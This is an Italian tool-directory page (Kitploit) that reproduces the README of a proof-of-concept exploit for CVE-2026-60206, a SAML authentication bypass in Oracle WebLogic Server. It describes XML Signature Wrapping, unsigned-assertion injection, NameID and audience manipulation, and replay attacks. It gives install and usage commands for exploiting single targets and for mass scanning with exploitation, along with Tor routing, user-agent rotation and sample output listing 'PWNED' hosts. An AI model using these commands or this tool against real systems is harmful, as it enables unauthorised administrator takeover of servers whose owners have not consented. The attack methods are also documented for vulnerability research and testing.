Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-60206 — Analisi tecnica e Proof-of-Concept per CVE-2026-60206, una vulnerabilità critica di bypass dell'autenticazione SAML in Oracle WebLogic Server. | Kitploit
Strumenti/GitHubGitHub/debajyoti0-0/cve-2026-60206
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazione
GitHubdebajyoti0-0/cve-2026-60206

CVE-2026-60206

Analisi tecnica e Proof-of-Concept per CVE-2026-60206, una vulnerabilità critica di bypass dell'autenticazione SAML in Oracle WebLogic Server.

Vedi Repository
26 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-60206 – PoC per il bypass dell'autenticazione SAML in Oracle WebLogic Server

Questo repository fornisce un exploit proof-of-concept per CVE-2026-60206, una vulnerabilità critica di bypass dell'autenticazione nell'implementazione SAML di Oracle WebLogic Server. La falla consente a un attaccante remoto con privilegi bassi di compromettere completamente il server falsificando le asserzioni SAML.

CVSS

⚠️ Disclaimer: Questo strumento è destinato esclusivamente a ricerca e test di sicurezza autorizzati. Usalo solo contro sistemi di tua proprietà o per i quali hai un'autorizzazione esplicita. Gli autori declinano ogni responsabilità per un uso improprio.

CVE-2026-60206 Logo

🔥 Panoramica della vulnerabilità

CVE-2026-60206 interessa il componente Core di Oracle WebLogic Server. La vulnerabilità deriva da una gestione impropria dell'autenticazione nell'implementazione del protocollo SAML. Molteplici vettori d'attacco — come XML Signature Wrapping (XSW), accettazione di asserzioni non firmate, manipolazione di NameID e bypass di audience/conditions — consentono a un attaccante di impersonare utenti arbitrari (ad es. weblogic) e ottenere accesso amministrativo.

Versioni interessate:

  • 12.2.1.4.0
  • 14.1.1.0.0
  • 14.1.2.0.0
  • 15.1.1.0.0

Il PoC implementa i seguenti vettori d'attacco:

  • XML Signature Wrapping (XSW) – manipolazione strutturale per far accettare al processore SAML un'asserzione non firmata.
  • Iniezione di asserzioni non firmate – crea una risposta SAML completamente non firmata (se WantAssertionsSigned non è applicato).
  • Manipolazione di NameID – confonde l'identity mapper tramite commenti XML, spazi bianchi o confusione di formato.
  • Bypass delle restrizioni Audience – rimuove o modifica AudienceRestriction per ampliare l'ambito.
  • Bypass di Conditions/Tempo – manipola NotBefore/NotOnOrAfter per aggirare i controlli di validità.
  • Attacco combinato – XSW + asserzione interna non firmata + manipolazione di NameID (con maggiori probabilità di successo).
  • Replay – riproduce una risposta SAML catturata con destinazione/recipient modificati.

✨ Funzionalità

  • Molteplici modalità d'attacco – scegli tra all, unsigned, xsw, nameid, audience, conditions, combo o replay.
  • Scansione di massa – rilevamento concorrente e sfruttamento opzionale su molti target (tramite -l).
  • Rilevamento della versione – identifica con precisione la versione di WebLogic tramite header, pagine di errore e WSDL.
  • Sondaggio degli endpoint SAML – scopre automaticamente endpoint ACS, metadata e SP‑initiated SAML.
  • Supporto Tor – instrada il traffico tramite Tor (SOCKS5/HTTP/SOCKS4) per l'anonimato.
  • Replay di richieste HTTP grezze – invia richieste HTTP grezze arbitrarie da un file (-r).
  • Supporto HTTP/2 – usa automaticamente httpx se installato, altrimenti ripiega su requests (HTTP/1.1).

📦 Installazione

root@kitploit:~
git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

Richiesti: requests, urllib3

Opzionali (migliorano le funzionalità):

  • httpx – per il supporto HTTP/2
  • lxml – per un parsing SAML potenziato
  • signxml, cryptography – per la gestione delle firme (non richiesti per lo sfruttamento)

🚀 Utilizzo

Target singolo – solo rilevamento

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect

Target singolo – esegui tutti i vettori d'attacco

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic

Target singolo – modalità d'attacco specifica

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin

Scansione di massa – rileva le versioni da file

root@kitploit:~
python CVE-2026-60206.py -l targets.txt -o results.json

Scansione di massa – rileva + sfrutta

root@kitploit:~
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20

Replay di una risposta SAML catturata

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml

Usa Tor e verifica la connettività

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor

Invia una richiesta HTTP grezza da file

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST

Controllo rapido di vulnerabilità (non exploit)

root@kitploit:~
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c

⚙️ Riferimento delle flag

Opzioni:

Target:

FlagDescription
-t, --target TARGETURL di un singolo target (ad es., https://host:7002).
-l, --list LIST

Opzioni di richiesta:

Configurazione dell'attacco:

Scansione di massa (con -l):

FlagDescription
--exploitTesta l'asserzione SAML non firmata (default: solo rilevamento).
-T, --threads THREADSThread concorrenti (default: 10).

Output:

FlagDescription
-v, --verboseAumenta la verbosità (output di debug).
-q, --quiet

🧪 Modalità in dettaglio

detect

Esegue il rilevamento della versione e il sondaggio degli endpoint SAML. Nessun attacco viene lanciato.

unsigned

Inietta un'asserzione SAML completamente non firmata. Se il target non applica WantAssertionsSigned, questo aggira completamente l'autenticazione.

Varianti: unsigned (default), unsigned_stripped (rimuove tutti i riferimenti alla firma).

xsw (XML Signature Wrapping)

Posiziona un'asserzione non firmata dannosa prima (o a involucro di) un'asserzione firmata valida. Il processore SAML potrebbe selezionare la prima asserzione mentre il validatore della firma controlla quella firmata.

Varianti: xsw1 (prepend semplice), xsw2 (stesso ID dell'originale), xsw3 (wrapper annidato), xsw4 (sibling).

nameid

Manipola il campo NameID per confondere l'identity mapper di WebLogic, consentendo di impersonare un utente diverso.

Varianti: comment_injection, whitespace, format_confusion, xpath_injection.

audience

Aggira i controlli di AudienceRestriction rimuovendo o modificando l'elemento audience.

Varianti: remove_audience, wildcard_audience, extra_audience.

conditions

Aggira le restrizioni basate sul tempo (ad es., NotBefore, NotOnOrAfter).

Varianti: future_timestamp, expired_timestamp, remove_conditions, infinite_validity.

combo

Combina XSW, asserzione non firmata e manipolazione di NameID in un unico payload – il vettore con maggiori probabilità di compromissione totale.

Varianti: combo_full (con iniezione di commenti), combo_stealth (con newline).

replay

Riproduce una risposta SAML precedentemente catturata, modificando opzionalmente la destinazione o rimuovendo le restrizioni audience.

Varianti: replay_modified (regola Destination/Recipient), replay_cross_sp (rimuove le restrizioni audience).

📝 Esempio di flusso di lavoro (Sfruttamento di un singolo target)

root@kitploit:~
$ python CVE-2026-60206.py -t https://192.168.1.100:7002 -u weblogic --mode combo

  ╔══════════════════════════════════════════════════════════════════════╗
  ║       CVE-2026-60206 — WebLogic SAML Authentication Bypass PoC       ║
  ║         Oracle WebLogic Server Core | CVSS 9.9 | CWE-287             ║
  ╚══════════════════════════════════════════════════════════════════════╝

🔍 Detecting WebLogic version and SAML configuration...
  Detected WebLogic version: 12.2.1.4.0
  ⚠️  Version 12.2.1.4.0 is IN SCOPE for CVE-2026-60206!
  Found SAML metadata: /saml2/sp/metadata
  Found SAML ACS: /saml2/sp/acs (HTTP 200)

============================================================
🚀 Starting comprehensive SAML attack suite
   Target: https://192.168.1.100:7002
   Target User: weblogic
============================================================

── Attack 1/2 ──
🎯 [combo/combo_full] Launching combined attack for: weblogic
✅ [combo/combo_full] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

── Attack 2/2 ──
🎯 [combo/combo_stealth] Launching combined attack for: weblogic
✅ [combo/combo_stealth] Authentication bypass SUCCEEDED! Logged in as: weblogic
   ACS Endpoint: /saml2/sp/acs

============================================================
📊 Results: 2/2 attack vectors succeeded
============================================================

 EXPLOIT SUCCESSFUL! 2 attack(s) bypassed authentication.
   - [combo/combo_full] → logged in as 'weblogic' via /saml2/sp/acs
   - [combo/combo_stealth] → logged in as 'weblogic' via /saml2/sp/acs
📄 Report saved: logs/report_20260725_123456.json

📝 Esempio di flusso di lavoro (Scansione di massa)

root@kitploit:~
$ python CVE-2026-60206.py -l targets.txt --exploit -o scan_results.csv --threads 10

============================================================
  CVE-2026-60206 Mass Scanner
  Targets: 50
  Threads: 10
  Mode:    Exploit
============================================================

  [10/50] 20.0% | Vuln:3 | Pwned:1 | 1.2 tgt/s  
  [!] VULN: https://10.0.0.5:7002 (12.2.1.4.0)
  [!!] PWNED: https://10.0.0.5:7002 - logged in as weblogic
  ... (continues) ...

============================================================
  SCAN SUMMARY
============================================================
  Total targets:   50
  Reachable:       45
  WebLogic:        12
  Vuln version:    8
  Exploited:       3
  Duration:        42.5s
============================================================

  [!!] SUCCESSFULLY EXPLOITED:
    https://10.0.0.5:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.10:7002 → weblogic via /saml2/sp/acs
    https://10.0.0.15:7002 → weblogic via /saml2/sp/acs

  [!] VULNERABLE VERSIONS (not yet exploited):
    https://10.0.0.20:7002 (14.1.1.0.0)
    https://10.0.0.25:7002 (15.1.1.0.0)
    ... (truncated)

🛠️ Creazione di un ambiente di test vulnerabile

Per testare questo PoC in sicurezza, configura un WebLogic Server con SAML abilitato e una delle versioni interessate. Ad esempio, puoi usare Docker:

root@kitploit:~
# Example (simplified – use official Oracle WebLogic images with SAML configuration)
docker run -p 7002:7002 container-registry.oracle.com/middleware/weblogic:12.2.1.4
# Then configure SAML via WebLogic console or scripts

La configurazione SAML deve includere almeno un Service Provider SAML 2.0 con un endpoint ACS (ad es., /saml2/sp/acs) e i metadata pubblicati.

🔗 Riferimenti

  • Advisory Oracle Critical Patch Update di luglio 2026
  • Dettaglio CVE-2026-60206 – NIST NVD
  • CWE-287: Autenticazione impropria
  • Analisi della sicurezza SAML 2.0 – XML Signature Wrapping

📜 Licenza

Questo progetto è concesso in licenza GNU v3.0 – consulta il file LICENSE per i dettagli.

🤝 Contributi

Issue e pull request sono benvenuti. Assicurati che i tuoi contributi rispettino le stesse linee guida sull'uso etico.

Ricorda: Ottieni sempre la dovuta autorizzazione prima di testare qualsiasi strumento di sicurezza. Rimani etico!

Scarica lo strumento
  • Rotazione dello User‑Agent – usa uno User‑Agent casuale o personalizzato.
  • Supporto proxy – invia tutte le richieste tramite un proxy HTTP/SOCKS.
  • Personalizzazione delle richieste – imposta timeout, tentativi, ritardi, disabilita i redirect e ripeti in base a un pattern regex.
  • Salvataggio dei payload – salva su disco i payload SAML generati (--save-payloads).
  • Controllo di vulnerabilità (-c / --check) – determina rapidamente se un target è vulnerabile (non exploit).
  • Output di report JSON/CSV – risultati strutturati per le scansioni di massa.
  • Logging verboso – output di debug dettagliato con console colorata.
  • FlagDescription
    -h, --helpMostra il messaggio di aiuto ed esci.
    --proxy PROXYURL del proxy (sostituito da --tor se usato).
    --no-verifyDisabilita la verifica del certificato SSL.
    --cookie COOKIECookie di sessione (ad es., name=value; name2=value2).
    --auth AUTHCredenziali di autenticazione di base (USER:PASS).
    File con elenco di target per scansione di massa, o singolo URL.
    -f, --file FILEAlias di --list.
    FlagDescription
    -r, --requestfile REQUESTFILECarica una richiesta HTTP grezza da file (sostituisce gli attacchi SAML).
    --method METHODMetodo HTTP da usare (per richiesta grezza o richiesta singola; default: GET).
    --random-agentUsa uno User‑Agent casuale dall'elenco integrato.
    -A, --user-agent USER_AGENTValore personalizzato per l'header User‑Agent.
    --torUsa la rete di anonimato Tor (SOCKS5 di default).
    --tor-port TOR_PORTPorta del proxy Tor (default: 9050).
    --tor-type {HTTP,SOCKS4,SOCKS5}Tipo di proxy Tor (default: SOCKS5).
    --check-torVerifica che Tor sia usato correttamente (esce con un verdetto).
    --delay DELAYRitardo in secondi tra ogni richiesta.
    --timeout TIMEOUTTimeout in secondi (default: 30).
    --retries RETRIESNumero di tentativi in caso di timeout/errori (default: 3).
    --retry-on RETRY_ONRipeti la richiesta se il contenuto della risposta corrisponde alla regex (ad es., 'captcha').
    -dr, --disable-redirectsDisabilita il seguito dei redirect HTTP.
    FlagDescription
    -m, --mode {all,detect,unsigned,xsw,nameid,audience,conditions,combo,replay}Modalità d'attacco (default: all).
    --detectRileva solo la versione di WebLogic e la configurazione SAML (nessun attacco).
    -c, --checkControllo rapido di vulnerabilità (solo rilevamento, esce con un verdetto).
    -u, --user USERUtente target da impersonare (default: weblogic).
    --groups GROUPSGruppi da includere nell'asserzione SAML (default: Administrators,Monitors).
    --issuer ISSUERID entità dell'Issuer SAML.
    --audience AUDIENCEID entità dell'Audience SAML.
    --relay-state RELAY_STATEParametro RelayState per il POST SAML.
    --base64Codifica in Base64 la risposta SAML nel POST.
    --extra-attrs [NAME=VALUE ...]Attributi SAML extra (ad es., role=admin).
    --replay-file REPLAY_FILEPercorso della risposta SAML catturata per il replay.
    --save-payloadsSalva i payload SAML generati in ./payloads/.
    --continue-on-successContinua i test dopo un attacco riuscito.
    Sopprime l'output non essenziale.
    --list-modesElenca tutte le modalità d'attacco con descrizioni ed esce.
    -o, --output OUTPUTScrive il report JSON o CSV su file.